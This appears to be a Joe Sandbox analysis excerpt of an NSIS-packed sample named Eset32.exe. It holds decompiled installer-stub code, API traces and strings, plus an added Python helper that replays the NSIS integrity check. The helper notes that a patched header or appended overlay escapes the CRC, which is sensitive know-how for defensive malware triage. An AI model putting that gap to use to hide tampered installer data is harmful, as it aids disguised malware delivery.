                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                          						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					_t71 =  *(_t76 + 0x48);
                                                          					_t86 = _t71;
                                                          					if(_t71 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t74 = 0x42e3c0;
                                                          					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                                                          					_t57 =  *0x42e3c0; // 0x43
                                                          					if(_t57 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					if(_t57 == 0x22) {
                                                          						_t74 = 0x42e3c1;
                                                          						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
                                                          					}
                                                          					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                          					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                          						L15:
                                                          						E004060F7(0x435400, E00405A8F(_t74));
                                                          						goto L16;
                                                          					} else {
                                                          						_t63 = GetFileAttributesA(_t74);
                                                          						if(_t63 == 0xffffffff) {
                                                          							L14:
                                                          							E00405AD6(_t74);
                                                          							goto L15;
                                                          						}
                                                          						_t92 = _t63 & 0x00000010;
                                                          						if((_t63 & 0x00000010) != 0) {
                                                          							goto L15;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,76DDFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Eset32.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76DDFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Eset32.exe" ,00000000), ref: 00403985
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76DDFA90), ref: 004039FA
                                                          • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe), ref: 00403A18
                                                          • LoadImageA.USER32 ref: 00403A61
                                                          • RegisterClassA.USER32 ref: 00403A9E
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                          • CreateWindowExA.USER32 ref: 00403AEB
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                          • GetClassInfoA.USER32 ref: 00403B4D
                                                          • GetClassInfoA.USER32 ref: 00403B5A
                                                          • RegisterClassA.USER32 ref: 00403B63
                                                          • DialogBoxParamA.USER32 ref: 00403B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\1.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 606308-3954497077
                                                          • Opcode ID: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                          • Opcode Fuzzy Hash: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          (rendered graph omitted; basic blocks 00402EA1-004030D5, legend: Executed / Not Executed)
                                                          C-Code - Quality: 80%
                                                          			E00402EA1(void* __eflags, signed int _a4) {
                                                          				DWORD* _v8;
                                                          				DWORD* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _v20;
                                                          				long _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				signed int _v44;
                                                          				long _t43;
                                                          				signed int _t50;
                                                          				void* _t57;
                                                          				intOrPtr* _t59;
                                                          				long _t60;
                                                          				signed int _t65;
                                                          				signed int _t70;
                                                          				signed int _t71;
                                                          				signed int _t77;
                                                          				intOrPtr _t80;
                                                          				long _t82;
                                                          				signed int _t85;
                                                          				signed int _t87;
                                                          				void* _t89;
                                                          				signed int _t90;
                                                          				signed int _t93;
                                                          				intOrPtr* _t94;
                                                          
                                                          				_t82 = 0;
                                                          				_v12 = 0;
                                                          				_v8 = 0;
                                                          				_t43 = GetTickCount();
                                                          				_t91 = "C:\\Users\\alfons\\Desktop\\Eset32.exe";
                                                          				 *0x42f430 = _t43 + 0x3e8;
                                                          				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\Eset32.exe", 0x400);
                                                          				_t89 = E00405C90(_t91, 0x80000000, 3);
                                                          				_v16 = _t89;
                                                          				 *0x40a018 = _t89;
                                                          				if(_t89 == 0xffffffff) {
                                                          					return "Error launching installer";
                                                          				}
                                                          				_t92 = "C:\\Users\\alfons\\Desktop";
                                                          				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
                                                          				E004060F7(0x437000, E00405AD6(_t92));
                                                          				_t50 = GetFileSize(_t89, 0);
                                                          				__eflags = _t50;
                                                          				 *0x42944c = _t50;
                                                          				_t93 = _t50;
                                                          				if(_t50 <= 0) {
                                                          					L24:
                                                          					E00402E3D(1);
                                                          					__eflags =  *0x42f438 - _t82;
                                                          					if( *0x42f438 == _t82) {
                                                          						goto L29;
                                                          					}
                                                          					__eflags = _v8 - _t82;
                                                          					if(_v8 == _t82) {
                                                          						L28:
                                                          						_t94 = GlobalAlloc(0x40, _v24);
                                                          						E00403300( *0x42f438 + 0x1c);
                                                          						_push(_v24);
                                                          						_push(_t94);
                                                          						_push(_t82);
                                                          						_push(0xffffffff); // executed
                                                          						_t57 = E004030D8(); // executed
                                                          						__eflags = _t57 - _v24;
                                                          						if(_t57 == _v24) {
                                                          							__eflags = _v44 & 0x00000001;
                                                          							 *0x42f434 = _t94;
                                                          							 *0x42f43c =  *_t94;
                                                          							if((_v44 & 0x00000001) != 0) {
                                                          								 *0x42f440 =  *0x42f440 + 1;
                                                          								__eflags =  *0x42f440;
                                                          							}
                                                          							_t40 = _t94 + 0x44; // 0x44
                                                          							_t59 = _t40;
                                                          							_t85 = 8;
                                                          							do {
                                                          								_t59 = _t59 - 8;
                                                          								 *_t59 =  *_t59 + _t94;
                                                          								_t85 = _t85 - 1;
                                                          								__eflags = _t85;
                                                          							} while (_t85 != 0);
                                                          							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                          							 *(_t94 + 0x3c) = _t60;
                                                          							E00405C4B(0x42f460, _t94 + 4, 0x40);
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						goto L29;
                                                          					}
                                                          					E00403300( *0x41d440);
                                                          					_t65 = E004032EA( &_a4, 4);
                                                          					__eflags = _t65;
                                                          					if(_t65 == 0) {
                                                          						goto L29;
                                                          					}
                                                          					__eflags = _v12 - _a4;
                                                          					if(_v12 != _a4) {
                                                          						goto L29;
                                                          					}
                                                          					goto L28;
                                                          				} else {
                                                          					do {
                                                          						_t90 = _t93;
                                                          						asm("sbb eax, eax");
                                                          						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                                                          						__eflags = _t93 - _t70;
                                                          						if(_t93 >= _t70) {
                                                          							_t90 = _t70;
                                                          						}
                                                          						_t71 = E004032EA(0x415440, _t90);
                                                          						__eflags = _t71;
                                                          						if(_t71 == 0) {
                                                          							E00402E3D(1);
                                                          							L29:
                                                          							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                          						}
                                                          						__eflags =  *0x42f438;
                                                          						if( *0x42f438 != 0) {
                                                          							__eflags = _a4 & 0x00000002;
                                                          							if((_a4 & 0x00000002) == 0) {
                                                          								E00402E3D(0);
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						E00405C4B( &_v44, 0x415440, 0x1c);
                                                          						_t77 = _v44;
                                                          						__eflags = _t77 & 0xfffffff0;
                                                          						if((_t77 & 0xfffffff0) != 0) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _v40 - 0xdeadbeef;
                                                          						if(_v40 != 0xdeadbeef) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _v28 - 0x74736e49;
                                                          						if(_v28 != 0x74736e49) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _v32 - 0x74666f73;
                                                          						if(_v32 != 0x74666f73) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _v36 - 0x6c6c754e;
                                                          						if(_v36 != 0x6c6c754e) {
                                                          							goto L20;
                                                          						}
                                                          						_a4 = _a4 | _t77;
                                                          						_t87 =  *0x41d440; // 0x3f0998
                                                          						 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                                                          						_t80 = _v20;
                                                          						__eflags = _t80 - _t93;
                                                          						 *0x42f438 = _t87;
                                                          						if(_t80 > _t93) {
                                                          							goto L29;
                                                          						}
                                                          						__eflags = _a4 & 0x00000008;
                                                          						if((_a4 & 0x00000008) != 0) {
                                                          							L16:
                                                          							_v8 = _v8 + 1;
                                                          							_t24 = _t80 - 4; // 0x40a194
                                                          							_t93 = _t24;
                                                          							__eflags = _t90 - _t93;
                                                          							if(_t90 > _t93) {
                                                          								_t90 = _t93;
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _a4 & 0x00000004;
                                                          						if((_a4 & 0x00000004) != 0) {
                                                          							break;
                                                          						}
                                                          						goto L16;
                                                          						L20:
                                                          						__eflags = _t93 -  *0x42944c; // 0x3f2b9c
                                                          						if(__eflags < 0) {
                                                          							_v12 = E004065B7(_v12, 0x415440, _t90);
                                                          						}
                                                          						 *0x41d440 =  *0x41d440 + _t90;
                                                          						_t93 = _t93 - _t90;
                                                          						__eflags = _t93;
                                                          					} while (_t93 != 0);
                                                          					_t82 = 0;
                                                          					__eflags = 0;
                                                          					goto L24;
                                                          				}
                                                          			}
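The function above is the NSIS exehead's header loader (loadHeaders): it scans the running executable in 512-byte chunks for the firstheader signature (flags, 0xDEADBEEF, "Null", "soft", "Inst", two lengths), re-computes the installer CRC32 and then inflates the compressed header, which is why the strings below include the NSIS integrity-check error text. The helper that follows replays that check on an arbitrary file. It is an added example written for this report, not code from Joe Sandbox or from the NSIS project; the field names follow the NSIS source, `cl_flags` stands in for the stub's `_a4` argument, and `build_sample` produces a constructed NSIS-shaped blob, not a real installer. Two properties visible in the decompile matter when triaging NSIS-packed samples such as this one: the CRC loop only runs while `left < m_length`, so the first 512 bytes (the PE headers) are never covered, and `left` is reset to `length_of_all_following_data - 4`, so any bytes appended after the NSIS data block are never read at all. A patched header or a trailing overlay therefore passes the stub's own self-check.

```python
"""Find and verify an NSIS 'firstheader' the way the stub above (E00402EA1) does.

Added analysis helper for this report; not code from Joe Sandbox or NSIS.
Layout and constants are read off the decompiled function: the 0x1c-byte
header, the 512-byte stepped scan, the CRC that skips the first chunk, and the
stored CRC in the last 4 bytes of 'length_of_all_following_data'.
"""
import struct
import sys
import zlib

FH_SIG = 0xDEADBEEF
FH_INT = (0x6C6C754E, 0x74666F73, 0x74736E49)      # "Null", "soft", "Inst" as LE dwords
FH_FLAGS_UNINSTALL, FH_FLAGS_SILENT, FH_FLAGS_NO_CRC, FH_FLAGS_FORCE_CRC = 1, 2, 4, 8
FH_FLAGS_MASK = 0xF                                  # stub rejects 'flags & 0xfffffff0'
FIRSTHEADER = struct.Struct("<7I")                   # 28 bytes: the 0x1c added to g_filehdrsize
SCAN_STEP = 512                                      # chunk size used until the header is found


def find_firstheader(data):
    """Return (offset, fields) of the first valid firstheader, or None.

    The stub reads 512-byte chunks and tests the start of each one, so only
    512-byte aligned offsets are candidates here as well."""
    for off in range(0, len(data) - FIRSTHEADER.size + 1, SCAN_STEP):
        flags, sig, i1, i2, i3, lofh, lofd = FIRSTHEADER.unpack_from(data, off)
        if (flags & ~FH_FLAGS_MASK) == 0 and sig == FH_SIG and (i1, i2, i3) == FH_INT:
            return off, {"flags": flags, "length_of_header": lofh,
                         "length_of_all_following_data": lofd}
    return None


def verify_nsis(data, cl_flags=0):
    """Replay the stub's integrity check.

    cl_flags mirrors the stub's _a4 (command-line derived flags), which it
    ORs with the flags stored in the header before deciding about the CRC."""
    found = find_firstheader(data)
    if found is None:
        return {"is_nsis": False}
    off, fh = found
    flags = cl_flags | fh["flags"]
    end = off + fh["length_of_all_following_data"]
    res = {"is_nsis": True, "header_offset": off, "flags": flags,
           "silent": bool(flags & FH_FLAGS_SILENT),
           "datablock_offset": off + FIRSTHEADER.size,
           "length_of_header": fh["length_of_header"],
           "data_end": end, "truncated": end > len(data),
           "overlay_bytes": max(0, len(data) - end)}   # never read by the stub
    if res["truncated"]:
        res["crc_ok"] = False                          # 'length_of_all_following_data > left'
        return res
    if not (flags & FH_FLAGS_FORCE_CRC) and (flags & FH_FLAGS_NO_CRC):
        res["crc_ok"] = None                           # stub breaks out of the loop: no CRC at all
        return res
    # 'left < m_length' skips the first 512-byte chunk unless the header sits in it,
    # and the loop ends 4 bytes before data_end, where the stored CRC lives.
    # NSIS's CRC32() is the zlib CRC-32, so zlib.crc32 reproduces it.
    start = 0 if off == 0 else SCAN_STEP
    computed = zlib.crc32(data[start:end - 4]) & 0xFFFFFFFF
    stored, = struct.unpack_from("<I", data, end - 4)
    res["crc_ok"] = computed == stored
    return res


def build_sample(datablock, flags=0, exehead_size=1024, overlay=b""):
    """Constructed test input: a fake 'exehead' followed by an NSIS-shaped
    firstheader, data block and CRC. Not a real installer; length_of_header
    is filled with the data block size as a placeholder."""
    exehead = b"MZ" + bytes((i * 7 + 3) & 0xFF for i in range(exehead_size - 2))
    lofd = FIRSTHEADER.size + len(datablock) + 4
    body = exehead + FIRSTHEADER.pack(flags, FH_SIG, *FH_INT, len(datablock), lofd) + datablock
    crc = zlib.crc32(body[SCAN_STEP:]) & 0xFFFFFFFF  # same range the stub hashes
    return body + struct.pack("<I", crc) + overlay


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else build_sample(b"payload" * 64)
    for key, value in verify_nsis(blob).items():
        print(f"{key:>18}: {value}")
```

Point it at a sample (`python nsis_firstheader.py Eset32.exe`) to confirm the NSIS wrapper and get `datablock_offset` and `data_end` for carving; with no argument it runs on the constructed blob. `overlay_bytes` is the part worth a second look on a malicious installer, since that region is invisible to the stub's check. From the NSIS documentation rather than this page: `/NCRC` on the installer command line is what sets FH_FLAGS_NO_CRC in `cl_flags`, and `CRCCheck force` at compile time sets FH_FLAGS_FORCE_CRC in the header, which is why the code tests FORCE_CRC before NO_CRC.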

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Eset32.exe,00000400), ref: 00402ECE
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Eset32.exe,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00402F1A
                                                          • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\Eset32.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Eset32.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-1586746597
                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph of E0040618A (0x40618a - 0x4063cf); API calls on the path: lstrlenA, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA. (Graph edge list omitted.)
                                                          C-Code - Quality: 72%
                                                          			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                          				struct _ITEMIDLIST* _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed char _v20;
                                                          				signed int _v24;
                                                          				signed char _v28;
                                                          				signed int _t38;
                                                          				CHAR* _t39;
                                                          				signed int _t41;
                                                          				char _t52;
                                                          				char _t53;
                                                          				char _t55;
                                                          				char _t57;
                                                          				void* _t65;
                                                          				char* _t66;
                                                          				signed int _t80;
                                                          				intOrPtr _t86;
                                                          				char _t88;
                                                          				void* _t89;
                                                          				CHAR* _t90;
                                                          				void* _t92;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				void* _t100;
                                                          
                                                          				_t92 = __esi;
                                                          				_t89 = __edi;
                                                          				_t65 = __ebx;
                                                          				_t38 = _a8;
                                                          				if(_t38 < 0) {
                                                          					_t86 =  *0x42ebfc; // 0x4ab049
                                                          					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                          				}
                                                          				_push(_t65);
                                                          				_push(_t92);
                                                          				_push(_t89);
                                                          				_t66 = _t38 +  *0x42f478;
                                                          				_t39 = 0x42e3c0;
                                                          				_t90 = 0x42e3c0;
                                                          				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                                                          					_t90 = _a4;
                                                          					_a4 = _a4 & 0x00000000;
                                                          				}
                                                          				while(1) {
                                                          					_t88 =  *_t66;
                                                          					if(_t88 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t90 - _t39 - 0x400;
                                                          					if(_t90 - _t39 >= 0x400) {
                                                          						break;
                                                          					}
                                                          					_t66 = _t66 + 1;
                                                          					__eflags = _t88 - 4;
                                                          					_a8 = _t66;
                                                          					if(__eflags >= 0) {
                                                          						if(__eflags != 0) {
                                                          							 *_t90 = _t88;
                                                          							_t90 =  &(_t90[1]);
                                                          							__eflags = _t90;
                                                          						} else {
                                                          							 *_t90 =  *_t66;
                                                          							_t90 =  &(_t90[1]);
                                                          							_t66 = _t66 + 1;
                                                          						}
                                                          						continue;
                                                          					}
                                                          					_t41 =  *((char*)(_t66 + 1));
                                                          					_t80 =  *_t66;
                                                          					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                          					_v24 = _t80;
                                                          					_v28 = _t80 | 0x00000080;
                                                          					_v16 = _t41;
                                                          					_v20 = _t41 | 0x00000080;
                                                          					_t66 = _a8 + 2;
                                                          					__eflags = _t88 - 2;
                                                          					if(_t88 != 2) {
                                                          						__eflags = _t88 - 3;
                                                          						if(_t88 != 3) {
                                                          							__eflags = _t88 - 1;
                                                          							if(_t88 == 1) {
                                                          								__eflags = (_t41 | 0xffffffff) - _t97;
                                                          								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                          							}
                                                          							L42:
                                                          							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                          							_t39 = 0x42e3c0;
                                                          							continue;
                                                          						}
                                                          						__eflags = _t97 - 0x1d;
                                                          						if(_t97 != 0x1d) {
                                                          							__eflags = (_t97 << 0xa) + 0x430000;
                                                          							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
                                                          						} else {
                                                          							E00406055(_t90,  *0x42f428);
                                                          						}
                                                          						__eflags = _t97 + 0xffffffeb - 7;
                                                          						if(_t97 + 0xffffffeb < 7) {
                                                          							L33:
                                                          							E004063D2(_t90);
                                                          						}
                                                          						goto L42;
                                                          					}
                                                          					_t52 =  *0x42f42c;
                                                          					__eflags = _t52;
                                                          					_t99 = 2;
                                                          					if(_t52 >= 0) {
                                                          						L13:
                                                          						_a8 = 1;
                                                          						L14:
                                                          						__eflags =  *0x42f4c4;
                                                          						if( *0x42f4c4 != 0) {
                                                          							_t99 = 4;
                                                          						}
                                                          						__eflags = _t80;
                                                          						if(__eflags >= 0) {
                                                          							__eflags = _t80 - 0x25;
                                                          							if(_t80 != 0x25) {
                                                          								__eflags = _t80 - 0x24;
                                                          								if(_t80 == 0x24) {
                                                          									GetWindowsDirectoryA(_t90, 0x400);
                                                          									_t99 = 0;
                                                          								}
                                                          								while(1) {
                                                          									__eflags = _t99;
                                                          									if(_t99 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t53 =  *0x42f424;
                                                          									_t99 = _t99 - 1;
                                                          									__eflags = _t53;
                                                          									if(_t53 == 0) {
                                                          										L26:
                                                          										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                          										__eflags = _t55;
                                                          										if(_t55 != 0) {
                                                          											L28:
                                                          											 *_t90 =  *_t90 & 0x00000000;
                                                          											__eflags =  *_t90;
                                                          											continue;
                                                          										}
                                                          										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                          										_v12 = _t55;
                                                          										__imp__CoTaskMemFree(_v8);
                                                          										__eflags = _v12;
                                                          										if(_v12 != 0) {
                                                          											goto L30;
                                                          										}
                                                          										goto L28;
                                                          									}
                                                          									__eflags = _a8;
                                                          									if(_a8 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
                                                          									__eflags = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L26;
                                                          								}
                                                          								goto L30;
                                                          							}
                                                          							GetSystemDirectoryA(_t90, 0x400);
                                                          							goto L30;
                                                          						} else {
                                                          							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                                                          							__eflags =  *_t90;
                                                          							if( *_t90 != 0) {
                                                          								L31:
                                                          								__eflags = _v16 - 0x1a;
                                                          								if(_v16 == 0x1a) {
                                                          									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							E0040618A(_t66, _t90, _t99, _t90, _v16);
                                                          							L30:
                                                          							__eflags =  *_t90;
                                                          							if( *_t90 == 0) {
                                                          								goto L33;
                                                          							}
                                                          							goto L31;
                                                          						}
                                                          					}
                                                          					__eflags = _t52 - 0x5a04;
                                                          					if(_t52 == 0x5a04) {
                                                          						goto L13;
                                                          					}
                                                          					__eflags = _v16 - 0x23;
                                                          					if(_v16 == 0x23) {
                                                          						goto L13;
                                                          					}
                                                          					__eflags = _v16 - 0x2e;
                                                          					if(_v16 == 0x2e) {
                                                          						goto L13;
                                                          					} else {
                                                          						_a8 = _a8 & 0x00000000;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				 *_t90 =  *_t90 & 0x00000000;
                                                          				if(_a4 == 0) {
                                                          					return _t39;
                                                          				}
                                                          				return E004060F7(_a4, _t39);
                                                          			}

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,76DDEA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                          • SHGetPathFromIDListA.SHELL32(76DDEA30,C:\Users\user\AppData\Roaming\1.exe), ref: 00406312
                                                          • CoTaskMemFree.OLE32(76DDEA30), ref: 0040631E
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00428145,76DDEA30), ref: 00406394
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming\1.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3561534422
                                                          • Opcode ID: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                          • Opcode Fuzzy Hash: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                           Control-flow Graph
                                                           (rendered graph; executed/not-executed colouring not reproduced in text) Basic blocks 401759 to 40238c. API calls in the graph: lstrcatA, CompareFileTime, SetFileTime, FindCloseChangeNotification. Internal calls: 402bce, 405afc, 4060f7, 405a8f, 4063d2, 40646b, 405c6b, 405c90, 40521e, 4030d8, 40618a, 405813.
